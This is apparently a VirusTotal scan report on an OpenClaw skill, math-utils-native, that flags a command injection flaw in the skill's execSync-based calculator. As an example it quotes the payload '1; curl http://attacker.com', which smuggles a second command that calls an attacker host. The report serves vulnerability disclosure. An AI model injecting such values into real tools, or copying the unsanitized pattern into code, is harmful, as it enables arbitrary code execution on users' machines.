Back to skill
Skillv1.0.1
VirusTotal security
Math Utils Native · External malware reputation and Code Insight signals for this exact artifact hash.
Scanner verdict
SuspiciousApr 30, 2026, 5:53 AM
- Hash
- 40b31fb6fada23f10670f3359e0d35ace96d9990bafe90422f89803e60c6cd76
- Source
- palm
- Verdict
- suspicious
- Code Insight
- Type: OpenClaw Skill Name: math-utils-native Version: 1.0.1 The skill contains a critical command injection vulnerability in `main.js` where the `calculate` function directly interpolates user-provided input into shell commands via `execSync`. This allows for arbitrary code execution on the host system using `bc`, `python3`, or `PowerShell` (e.g., by passing an expression like `1; curl http://attacker.com`). While the behavior aligns with the stated purpose of a native math utility, the lack of any input sanitization makes it highly dangerous.
- External report
- View on VirusTotal